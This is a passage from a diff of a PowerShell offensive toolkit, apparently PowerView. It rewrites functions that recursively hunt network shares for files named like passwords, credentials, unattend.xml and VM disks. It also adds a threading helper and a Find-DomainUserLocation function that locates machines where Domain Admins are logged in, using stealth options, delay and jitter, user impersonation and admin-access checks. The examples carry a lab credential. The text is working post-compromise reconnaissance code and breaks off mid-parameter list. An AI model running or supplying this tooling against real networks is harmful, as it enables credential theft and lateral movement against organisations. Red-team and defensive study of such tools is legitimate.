+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
- .PARAMETER Path
+.DESCRIPTION
- UNC/local path to recursively search.
+This function recursively searches a given UNC path for files with
+specific keywords in the name (default of pass, sensitive, secret, admin,
+login and unattend*.xml). By default, hidden files/folders are included
+in search results. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
+is used to temporarily map the remote share.
- .PARAMETER Terms
+.PARAMETER Path
- Terms to search for.
+UNC/local path to recursively search.
- .PARAMETER OfficeDocs
+.PARAMETER Include
- Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
+Only return files/folders that match the specified array of strings,
+i.e. @(*.doc*, *.xls*, *.ppt*)
- .PARAMETER FreshEXEs
+.PARAMETER LastAccessTime
- Switch. Find .EXEs accessed within the last week.
+Only return files with a LastAccessTime greater than this date value.
- .PARAMETER LastAccessTime
+.PARAMETER LastWriteTime
- Only return files with a LastAccessTime greater than this date value.
+Only return files with a LastWriteTime greater than this date value.
- .PARAMETER LastWriteTime
+.PARAMETER CreationTime
- Only return files with a LastWriteTime greater than this date value.
+Only return files with a CreationTime greater than this date value.
- .PARAMETER CreationTime
+.PARAMETER OfficeDocs
- Only return files with a CreationTime greater than this date value.
+Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
- .PARAMETER ExcludeFolders
+.PARAMETER FreshEXEs
- Switch. Exclude folders from the search results.
+Switch. Find .EXEs accessed within the last 7 days.
- .PARAMETER ExcludeHidden
+.PARAMETER ExcludeFolders
- Switch. Exclude hidden files and folders from the search results.
+Switch. Exclude folders from the search results.
- .PARAMETER CheckWriteAccess
+.PARAMETER ExcludeHidden
- Switch. Only returns files the current user has write access to.
+Switch. Exclude hidden files and folders from the search results.
- .PARAMETER OutFile
+.PARAMETER CheckWriteAccess
- Output results to a specified csv output file.
+Switch. Only returns files the current user has write access to.
- .PARAMETER UsePSDrive
+.PARAMETER Credential
- Switch. Mount target remote path with temporary PSDrives.
+A [Management.Automation.PSCredential] object of alternate credentials
+to connect to remote systems for file enumeration.
- .OUTPUTS
+.EXAMPLE
- The full path, owner, lastaccess time, lastwrite time, and size for each found file.
+Find-InterestingFile -Path "C:\Backup\"
- .EXAMPLE
+Returns any files on the local path C:\Backup\ that have the default
+search term set in the title.
- PS C:\> Find-InterestingFile -Path C:\Backup\
-
- Returns any files on the local path C:\Backup\ that have the default
- search term set in the title.
+.EXAMPLE
- .EXAMPLE
+Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)
- PS C:\> Find-InterestingFile -Path \\WINDOWS7\Users\ -Terms salaries,email -OutFile out.csv
-
- Returns any files on the remote path \\WINDOWS7\Users\ that have 'salaries'
- or 'email' in the title, and writes the results out to a csv file
- named 'out.csv'
+Returns any files on the remote path \\WINDOWS7\Users\ that have the default
+search term set in the title and were accessed within the last week.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Find-InterestingFile -Path \\WINDOWS7\Users\ -LastAccessTime (Get-Date).AddDays(-7)
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingFile -Credential $Cred -Path "\\PRIMARY.testlab.local\C$\Temp\"
- Returns any files on the remote path \\WINDOWS7\Users\ that have the default
- search term set in the title and were accessed within the last week.
+.OUTPUTS
- .LINK
-
- http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/
+PowerView.FoundFile
#>
-
- param(
- [Parameter(ValueFromPipeline=$True)]
- [String]
- $Path = '.\',
- [Alias('Terms')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.FoundFile')]
+ [CmdletBinding(DefaultParameterSetName = 'FileSpecification')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
[String[]]
- $SearchTerms = @('pass', 'sensitive', 'admin', 'login', 'secret', 'unattend*.xml', '.vmdk', 'creds', 'credential', '.config'),
-
- [Switch]
- $OfficeDocs,
+ $Path = '.\',
- [Switch]
- $FreshEXEs,
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('SearchTerms', 'Terms')]
+ [String[]]
+ $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),
- [String]
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
$LastAccessTime,
- [String]
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
$LastWriteTime,
- [String]
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
$CreationTime,
+ [Parameter(ParameterSetName = 'OfficeDocs')]
+ [Switch]
+ $OfficeDocs,
+
+ [Parameter(ParameterSetName = 'FreshEXEs')]
+ [Switch]
+ $FreshEXEs,
+
+ [Parameter(ParameterSetName = 'FileSpecification')]
[Switch]
$ExcludeFolders,
+ [Parameter(ParameterSetName = 'FileSpecification')]
[Switch]
$ExcludeHidden,
[Switch]
$CheckWriteAccess,
- [String]
- $OutFile,
-
- [Switch]
- $UsePSDrive
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
- begin {
-
- $Path += if(!$Path.EndsWith('\')) {"\"}
-
- if ($Credential) {
- $UsePSDrive = $True
+ BEGIN {
+ $SearcherArguments = @{
+ 'Recurse' = $True
+ 'ErrorAction' = 'SilentlyContinue'
+ 'Include' = $Include
}
-
- # append wildcards to the front and back of all search terms
- $SearchTerms = $SearchTerms | ForEach-Object { if($_ -notmatch '^\*.*\*$') {"*$($_)*"} else{$_} }
-
- # search just for office documents if specified
- if ($OfficeDocs) {
- $SearchTerms = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx')
+ if ($PSBoundParameters['OfficeDocs']) {
+ $SearcherArguments['Include'] = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx')
}
-
- # find .exe's accessed within the last 7 days
- if($FreshEXEs) {
- # get an access time limit of 7 days ago
+ elseif ($PSBoundParameters['FreshEXEs']) {
+ # find .exe's accessed within the last 7 days
$LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy')
- $SearchTerms = '*.exe'
+ $SearcherArguments['Include'] = @('*.exe')
}
+ $SearcherArguments['Force'] = -not $PSBoundParameters['ExcludeHidden']
- if($UsePSDrive) {
- # if we're PSDrives, create a temporary mount point
-
- $Parts = $Path.split('\')
- $FolderPath = $Parts[0..($Parts.length-2)] -join '\'
- $FilePath = $Parts[-1]
-
- $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join ''
-
- Write-Verbose "Mounting path '$Path' using a temp PSDrive at $RandDrive"
-
- try {
- $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop
- }
- catch {
- Write-Verbose "Error mounting path '$Path' : $_"
- return $Null
- }
-
- # so we can cd/dir the new drive
- $Path = "${RandDrive}:\${FilePath}"
- }
- }
-
- process {
+ $MappedComputers = @{}
- Write-Verbose "[*] Search path $Path"
-
- function Invoke-CheckWrite {
+ function Test-Write {
# short helper to check is the current user can write to a file
- [CmdletBinding()]param([String]$Path)
+ [CmdletBinding()]Param([String]$Path)
try {
- $Filetest = [IO.FILE]::OpenWrite($Path)
+ $Filetest = [IO.File]::OpenWrite($Path)
$Filetest.Close()
$True
}
catch {
- Write-Verbose -Message $Error[0]
$False
}
}
+ }
- $SearchArgs = @{
- 'Path' = $Path
- 'Recurse' = $True
- 'Force' = $(-not $ExcludeHidden)
- 'Include' = $SearchTerms
- 'ErrorAction' = 'SilentlyContinue'
- }
+ PROCESS {
+ ForEach ($TargetPath in $Path) {
+ if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+ $HostComputer = (New-Object System.Uri($TargetPath)).Host
+ if (-not $MappedComputers[$HostComputer]) {
+ # map IPC$ to this computer if it's not already
+ Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
+ $MappedComputers[$HostComputer] = $True
+ }
+ }
- Get-ChildItem @SearchArgs | ForEach-Object {
- Write-Verbose $_
- # check if we're excluding folders
- if(!$ExcludeFolders -or !$_.PSIsContainer) {$_}
- } | ForEach-Object {
- if($LastAccessTime -or $LastWriteTime -or $CreationTime) {
- if($LastAccessTime -and ($_.LastAccessTime -gt $LastAccessTime)) {$_}
- elseif($LastWriteTime -and ($_.LastWriteTime -gt $LastWriteTime)) {$_}
- elseif($CreationTime -and ($_.CreationTime -gt $CreationTime)) {$_}
+ $SearcherArguments['Path'] = $TargetPath
+ Get-ChildItem @SearcherArguments | ForEach-Object {
+ # check if we're excluding folders
+ $Continue = $True
+ if ($PSBoundParameters['ExcludeFolders'] -and ($_.PSIsContainer)) {
+ Write-Verbose "Excluding: $($_.FullName)"
+ $Continue = $False
+ }
+ if ($LastAccessTime -and ($_.LastAccessTime -lt $LastAccessTime)) {
+ $Continue = $False
+ }
+ if ($PSBoundParameters['LastWriteTime'] -and ($_.LastWriteTime -lt $LastWriteTime)) {
+ $Continue = $False
+ }
+ if ($PSBoundParameters['CreationTime'] -and ($_.CreationTime -lt $CreationTime)) {
+ $Continue = $False
+ }
+ if ($PSBoundParameters['CheckWriteAccess'] -and (-not (Test-Write -Path $_.FullName))) {
+ $Continue = $False
+ }
+ if ($Continue) {
+ $FileParams = @{
+ 'Path' = $_.FullName
+ 'Owner' = $((Get-Acl $_.FullName).Owner)
+ 'LastAccessTime' = $_.LastAccessTime
+ 'LastWriteTime' = $_.LastWriteTime
+ 'CreationTime' = $_.CreationTime
+ 'Length' = $_.Length
+ }
+ $FoundFile = New-Object -TypeName PSObject -Property $FileParams
+ $FoundFile.PSObject.TypeNames.Insert(0, 'PowerView.FoundFile')
+ $FoundFile
+ }
}
- else {$_}
- } | ForEach-Object {
- # filter for write access (if applicable)
- if((-not $CheckWriteAccess) -or (Invoke-CheckWrite -Path $_.FullName)) {$_}
- } | Select-Object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,CreationTime,Length | ForEach-Object {
- # check if we're outputting to the pipeline or an output file
- if($OutFile) {Export-PowerViewCSV -InputObject $_ -OutFile $OutFile}
- else {$_}
}
}
- end {
- if($UsePSDrive -and $RandDrive) {
- Write-Verbose "Removing temp PSDrive $RandDrive"
- Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force
- }
+ END {
+ # remove the IPC$ mappings
+ $MappedComputers.Keys | Remove-RemoteConnection
}
}
@@ -9248,62 +16013,58 @@ function Find-InterestingFile {
#
########################################################
-function Invoke-ThreadedFunction {
+function New-ThreadedFunction {
# Helper used by any threaded host enumeration functions
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[CmdletBinding()]
- param(
- [Parameter(Position=0,Mandatory=$True)]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[String[]]
$ComputerName,
- [Parameter(Position=1,Mandatory=$True)]
+ [Parameter(Position = 1, Mandatory = $True)]
[System.Management.Automation.ScriptBlock]
$ScriptBlock,
- [Parameter(Position=2)]
+ [Parameter(Position = 2)]
[Hashtable]
$ScriptParameters,
[Int]
- [ValidateRange(1,100)]
+ [ValidateRange(1, 100)]
$Threads = 20,
[Switch]
$NoImports
)
- begin {
-
- if ($PSBoundParameters['Debug']) {
- $DebugPreference = 'Continue'
- }
-
- Write-Verbose "[*] Total number of hosts: $($ComputerName.count)"
-
+ BEGIN {
# Adapted from:
# http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/
$SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
- $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState()
+
+ # # $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState()
+ # force a single-threaded apartment state (for token-impersonation stuffz)
+ $SessionState.ApartmentState = [System.Threading.ApartmentState]::STA
# import the current session state's variables and functions so the chained PowerView
# functionality can be used by the threaded blocks
- if(!$NoImports) {
-
+ if (-not $NoImports) {
# grab all the current variables for this runspace
$MyVars = Get-Variable -Scope 2
# these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice
- $VorbiddenVars = @("?","args","ConsoleFileName","Error","ExecutionContext","false","HOME","Host","input","InputObject","MaximumAliasCount","MaximumDriveCount","MaximumErrorCount","MaximumFunctionCount","MaximumHistoryCount","MaximumVariableCount","MyInvocation","null","PID","PSBoundParameters","PSCommandPath","PSCulture","PSDefaultParameterValues","PSHOME","PSScriptRoot","PSUICulture","PSVersionTable","PWD","ShellId","SynchronizedHash","true")
+ $VorbiddenVars = @('?','args','ConsoleFileName','Error','ExecutionContext','false','HOME','Host','input','InputObject','MaximumAliasCount','MaximumDriveCount','MaximumErrorCount','MaximumFunctionCount','MaximumHistoryCount','MaximumVariableCount','MyInvocation','null','PID','PSBoundParameters','PSCommandPath','PSCulture','PSDefaultParameterValues','PSHOME','PSScriptRoot','PSUICulture','PSVersionTable','PWD','ShellId','SynchronizedHash','true')
- # Add Variables from Parent Scope (current runspace) into the InitialSessionState
- ForEach($Var in $MyVars) {
- if($VorbiddenVars -NotContains $Var.Name) {
+ # add Variables from Parent Scope (current runspace) into the InitialSessionState
+ ForEach ($Var in $MyVars) {
+ if ($VorbiddenVars -NotContains $Var.Name) {
$SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes))
}
}
- # Add Functions from current runspace to the InitialSessionState
- ForEach($Function in (Get-ChildItem Function:)) {
+ # add Functions from current runspace to the InitialSessionState
+ ForEach ($Function in (Get-ChildItem Function:)) {
$SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition))
}
}
@@ -9313,2300 +16074,2296 @@ function Invoke-ThreadedFunction {
# Thanks Carlos!
# create a pool of maxThread runspaces
- $Pool = [runspacefactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host)
+ $Pool = [RunspaceFactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host)
$Pool.Open()
- $method = $null
- ForEach ($m in [PowerShell].GetMethods() | Where-Object { $_.Name -eq "BeginInvoke" }) {
- $methodParameters = $m.GetParameters()
- if (($methodParameters.Count -eq 2) -and $methodParameters[0].Name -eq "input" -and $methodParameters[1].Name -eq "output") {
- $method = $m.MakeGenericMethod([Object], [Object])
+ # do some trickery to get the proper BeginInvoke() method that allows for an output queue
+ $Method = $Null
+ ForEach ($M in [PowerShell].GetMethods() | Where-Object { $_.Name -eq 'BeginInvoke' }) {
+ $MethodParameters = $M.GetParameters()
+ if (($MethodParameters.Count -eq 2) -and $MethodParameters[0].Name -eq 'input' -and $MethodParameters[1].Name -eq 'output') {
+ $Method = $M.MakeGenericMethod([Object], [Object])
break
}
}
$Jobs = @()
- }
-
- process {
+ $ComputerName = $ComputerName | Where-Object {$_ -and $_.Trim()}
+ Write-Verbose "[New-ThreadedFunction] Total number of hosts: $($ComputerName.count)"
- ForEach ($Computer in $ComputerName) {
-
- # make sure we get a server name
- if ($Computer -ne '') {
- # Write-Verbose "[*] Enumerating server $Computer ($($Counter+1) of $($ComputerName.count))"
+ # partition all hosts from -ComputerName into $Threads number of groups
+ if ($Threads -ge $ComputerName.Length) {
+ $Threads = $ComputerName.Length
+ }
+ $ElementSplitSize = [Int]($ComputerName.Length/$Threads)
+ $ComputerNamePartitioned = @()
+ $Start = 0
+ $End = $ElementSplitSize
- While ($($Pool.GetAvailableRunspaces()) -le 0) {
- Start-Sleep -MilliSeconds 500
- }
+ for($i = 1; $i -le $Threads; $i++) {
+ $List = New-Object System.Collections.ArrayList
+ if ($i -eq $Threads) {
+ $End = $ComputerName.Length
+ }
+ $List.AddRange($ComputerName[$Start..($End-1)])
+ $Start += $ElementSplitSize
+ $End += $ElementSplitSize
+ $ComputerNamePartitioned += @(,@($List.ToArray()))
+ }
- # create a "powershell pipeline runner"
- $p = [powershell]::create()
+ Write-Verbose "[New-ThreadedFunction] Total number of threads/partitions: $Threads"
- $p.runspacepool = $Pool
+ ForEach ($ComputerNamePartition in $ComputerNamePartitioned) {
+ # create a "powershell pipeline runner"
+ $PowerShell = [PowerShell]::Create()
+ $PowerShell.runspacepool = $Pool
- # add the script block + arguments
- $Null = $p.AddScript($ScriptBlock).AddParameter('ComputerName', $Computer)
- if($ScriptParameters) {
- ForEach ($Param in $ScriptParameters.GetEnumerator()) {
- $Null = $p.AddParameter($Param.Name, $Param.Value)
- }
+ # add the script block + arguments with the given computer partition
+ $Null = $PowerShell.AddScript($ScriptBlock).AddParameter('ComputerName', $ComputerNamePartition)
+ if ($ScriptParameters) {
+ ForEach ($Param in $ScriptParameters.GetEnumerator()) {
+ $Null = $PowerShell.AddParameter($Param.Name, $Param.Value)
}
+ }
- $o = New-Object Management.Automation.PSDataCollection[Object]
+ # create the output queue
+ $Output = New-Object Management.Automation.PSDataCollection[Object]
- $Jobs += @{
- PS = $p
- Output = $o
- Result = $method.Invoke($p, @($null, [Management.Automation.PSDataCollection[Object]]$o))
- }
+ # kick off execution using the BeginInvok() method that allows queues
+ $Jobs += @{
+ PS = $PowerShell
+ Output = $Output
+ Result = $Method.Invoke($PowerShell, @($Null, [Management.Automation.PSDataCollection[Object]]$Output))
}
}
}
- end {
- Write-Verbose "Waiting for threads to finish..."
+ END {
+ Write-Verbose "[New-ThreadedFunction] Threads executing"
+ # continuously loop through each job queue, consuming output as appropriate
Do {
ForEach ($Job in $Jobs) {
$Job.Output.ReadAll()
}
- } While (($Jobs | Where-Object { ! $_.Result.IsCompleted }).Count -gt 0)
+ Start-Sleep -Seconds 1
+ }
+ While (($Jobs | Where-Object { -not $_.Result.IsCompleted }).Count -gt 0)
+
+ $SleepSeconds = 100
+ Write-Verbose "[New-ThreadedFunction] Waiting $SleepSeconds seconds for final cleanup..."
- ForEach ($Job in $Jobs) {
- $Job.PS.Dispose()
+ # cleanup- make sure we didn't miss anything
+ for ($i=0; $i -lt $SleepSeconds; $i++) {
+ ForEach ($Job in $Jobs) {
+ $Job.Output.ReadAll()
+ $Job.PS.Dispose()
+ }
+ Start-Sleep -S 1
}
$Pool.Dispose()
- Write-Verbose "All threads completed!"
+ Write-Verbose "[New-ThreadedFunction] all threads completed"
}
}
-function Invoke-UserHunter {
+function Find-DomainUserLocation {
<#
- .SYNOPSIS
-
- Finds which machines users of a specified group are logged into.
-
- Author: @harmj0y
- License: BSD 3-Clause
-
- .DESCRIPTION
-
- This function finds the local domain name for a host using Get-NetDomain,
- queries the domain for users of a specified group (default "domain admins")
- with Get-NetGroupMember or reads in a target user list, queries the domain for all
- active machines with Get-NetComputer or reads in a pre-populated host list,
- randomly shuffles the target list, then for each server it gets a list of
- active users with Get-NetSession/Get-NetLoggedon. The found user list is compared
- against the target list, and a status message is displayed for any hits.
- The flag -CheckAccess will check each positive host to see if the current
- user has local admin access to the machine.
-
- .PARAMETER ComputerName
-
- Host array to enumerate, passable on the pipeline.
-
- .PARAMETER ComputerFile
+.SYNOPSIS
- File of hostnames/IPs to search.
+Finds domain machines where specific users are logged into.
- .PARAMETER ComputerFilter
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction
- Host filter name to query AD for, wildcards accepted.
+.DESCRIPTION
- .PARAMETER ComputerADSpath
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and queries the domain for users of a specified group
+(default 'Domain Admins') with Get-DomainGroupMember. Then for each server the
+function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon
+The found user list is compared against the target list, and any matches are
+displayed. If -ShowAll is specified, all results are displayed instead of
+the filtered set. If -Stealth is specified, then likely highly-trafficed servers
+are enumerated with Get-DomainFileServer/Get-DomainController, and session
+enumeration is executed only against those servers. If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
- The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER ComputerName
- .PARAMETER Unconstrained
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
- Switch. Only enumerate computers that have unconstrained delegation.
+.PARAMETER Domain
- .PARAMETER GroupName
+Specifies the domain to query for computers AND users, defaults to the current domain.
- Group name to query for target users.
+.PARAMETER ComputerDomain
- .PARAMETER TargetServer
+Specifies the domain to query for computers, defaults to the current domain.
- Hunt for users who are effective local admins on a target server.
+.PARAMETER ComputerLDAPFilter
- .PARAMETER UserName
+Specifies an LDAP query string that is used to search for computer objects.
- Specific username to search for.
+.PARAMETER ComputerSearchBase
- .PARAMETER UserFilter
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
- A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)"
+.PARAMETER ComputerUnconstrained
- .PARAMETER UserADSpath
+Switch. Search computer objects that have unconstrained delegation.
- The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER ComputerOperatingSystem
- .PARAMETER UserFile
+Search computers with a specific operating system, wildcards accepted.
- File of usernames to search for.
+.PARAMETER ComputerServicePack
- .PARAMETER AdminCount
+Search computers with a specific service pack, wildcards accepted.
- Switch. Hunt for users with adminCount=1.
+.PARAMETER ComputerSiteName
- .PARAMETER AllowDelegation
+Search computers in the specific AD Site name, wildcards accepted.
- Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation'
+.PARAMETER UserIdentity
- .PARAMETER StopOnSuccess
+Specifies one or more user identities to search for.
- Switch. Stop hunting after finding after finding a target user.
+.PARAMETER UserDomain
- .PARAMETER NoPing
+Specifies the domain to query for users to search for, defaults to the current domain.
- Don't ping each host to ensure it's up before enumerating.
+.PARAMETER UserLDAPFilter
- .PARAMETER CheckAccess
+Specifies an LDAP query string that is used to search for target users.
- Switch. Check if the current user has local admin access to found machines.
+.PARAMETER UserSearchBase
- .PARAMETER Delay
+Specifies the LDAP source to search through for target users.
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
- Delay between enumerating hosts, defaults to 0
+.PARAMETER UserGroupIdentity
- .PARAMETER Jitter
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
- Jitter for the host delay, defaults to +/- 0.3
+.PARAMETER UserAdminCount
- .PARAMETER Domain
+Switch. Search for users users with '(adminCount=1)' (meaning are/were privileged).
- Domain for query for machines, defaults to the current domain.
+.PARAMETER UserAllowDelegation
- .PARAMETER DomainController
+Switch. Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.
- Domain controller to reflect LDAP queries through.
+.PARAMETER CheckAccess
- .PARAMETER ShowAll
+Switch. Check if the current user has local admin access to computers where target users are found.
- Switch. Return all user location results, i.e. Invoke-UserView functionality.
+.PARAMETER Server
- .PARAMETER SearchForest
+Specifies an Active Directory server (domain controller) to bind to.
- Switch. Search all domains in the forest for target users instead of just
- a single domain.
+.PARAMETER SearchScope
- .PARAMETER Stealth
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
- Switch. Only enumerate sessions from connonly used target servers.
+.PARAMETER ResultPageSize
- .PARAMETER StealthSource
+Specifies the PageSize to set for the LDAP searcher object.
- The source of target servers to use, 'DFS' (distributed file servers),
- 'DC' (domain controllers), 'File' (file servers), or 'All'
+.PARAMETER ServerTimeLimit
- .PARAMETER ForeignUsers
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Switch. Only return results that are not part of searched domain.
+.PARAMETER Tombstone
- .PARAMETER Threads
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- The maximum concurrent threads to execute.
+.PARAMETER Credential
- .PARAMETER Poll
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
- Continuously poll for sessions for the given duration. Automatically
- sets Threads to the number of computers being polled.
+.PARAMETER StopOnSuccess
- .EXAMPLE
+Switch. Stop hunting after finding after finding a target user.
- PS C:\> Invoke-UserHunter -CheckAccess
+.PARAMETER Delay
- Finds machines on the local domain where domain admins are logged into
- and checks if the current user has local administrator access.
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
- .EXAMPLE
+.PARAMETER Jitter
- PS C:\> Invoke-UserHunter -Domain 'testing'
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
- Finds machines on the 'testing' domain where domain admins are logged into.
+.PARAMETER ShowAll
- .EXAMPLE
+Switch. Return all user location results instead of filtering based on target
+specifications.
- PS C:\> Invoke-UserHunter -Threads 20
+.PARAMETER Stealth
- Multi-threaded user hunting, replaces Invoke-UserHunterThreaded.
+Switch. Only enumerate sessions from connonly used target servers.
- .EXAMPLE
+.PARAMETER StealthSource
- PS C:\> Invoke-UserHunter -UserFile users.txt -ComputerFile hosts.txt
+The source of target servers to use, 'DFS' (distributed file servers),
+'DC' (domain controllers), 'File' (file servers), or 'All' (the default).
- Finds machines in hosts.txt where any members of users.txt are logged in
- or have sessions.
+.PARAMETER Threads
- .EXAMPLE
+The number of threads to use for user searching, defaults to 20.
- PS C:\> Invoke-UserHunter -GroupName "Power Users" -Delay 60
+.EXAMPLE
- Find machines on the domain where members of the "Power Users" groups are
- logged into with a 60 second (+/- *.3) randomized delay between
- touching each host.
+Find-DomainUserLocation
- .EXAMPLE
+Searches for 'Domain Admins' by enumerating every computer in the domain.
- PS C:\> Invoke-UserHunter -TargetServer FILESERVER
+.EXAMPLE
- Query FILESERVER for useres who are effective local administrators using
- Get-NetLocalGroup -Recurse, and hunt for that user set on the network.
+Find-DomainUserLocation -Stealth -ShowAll
- .EXAMPLE
+Enumerates likely highly-trafficked servers, performs just session enumeration
+against each, and outputs all results.
- PS C:\> Invoke-UserHunter -SearchForest
+.EXAMPLE
- Find all machines in the current forest where domain admins are logged in.
+Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local
- .EXAMPLE
+Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged
+users in dev.testlab.local.
- PS C:\> Invoke-UserHunter -Stealth
+.EXAMPLE
- Executes old Invoke-StealthUserHunter functionality, enumerating commonly
- used servers and checking just sessions for each.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainUserLocation -Domain testlab.local -Credential $Cred
- .EXAMPLE
+Searches for domain admin locations in the testlab.local using the specified alternate credentials.
- PS C:\> Invoke-UserHunter -Stealth -StealthSource DC -Poll 3600 -Delay 5 -ShowAll | ? { ! $_.UserName.EndsWith('$') }
+.OUTPUTS
- Poll Domain Controllers in parallel for sessions for an hour, waiting five
- seconds before querying each DC again and filtering out computer accounts.
-
- .LINK
- http://blog.harmj0y.net
+PowerView.UserLocation
#>
- [CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Hosts')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.UserLocation')]
+ [CmdletBinding(DefaultParameterSetName = 'UserGroupIdentity')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DNSHostName')]
[String[]]
$ComputerName,
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFile,
+ $ComputerDomain,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFilter,
+ $ComputerLDAPFilter,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerADSpath,
+ $ComputerSearchBase,
+ [Alias('Unconstrained')]
[Switch]
- $Unconstrained,
+ $ComputerUnconstrained,
+ [ValidateNotNullOrEmpty()]
+ [Alias('OperatingSystem')]
[String]
- $GroupName = 'Domain Admins',
+ $ComputerOperatingSystem,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ServicePack')]
[String]
- $TargetServer,
+ $ComputerServicePack,
+ [ValidateNotNullOrEmpty()]
+ [Alias('SiteName')]
[String]
- $UserName,
+ $ComputerSiteName,
+
+ [Parameter(ParameterSetName = 'UserIdentity')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $UserIdentity,
+ [ValidateNotNullOrEmpty()]
[String]
- $UserFilter,
+ $UserDomain,
+ [ValidateNotNullOrEmpty()]
[String]
- $UserADSpath,
+ $UserLDAPFilter,
- [ValidateScript({Test-Path -Path $_ })]
+ [ValidateNotNullOrEmpty()]
[String]
- $UserFile,
+ $UserSearchBase,
+
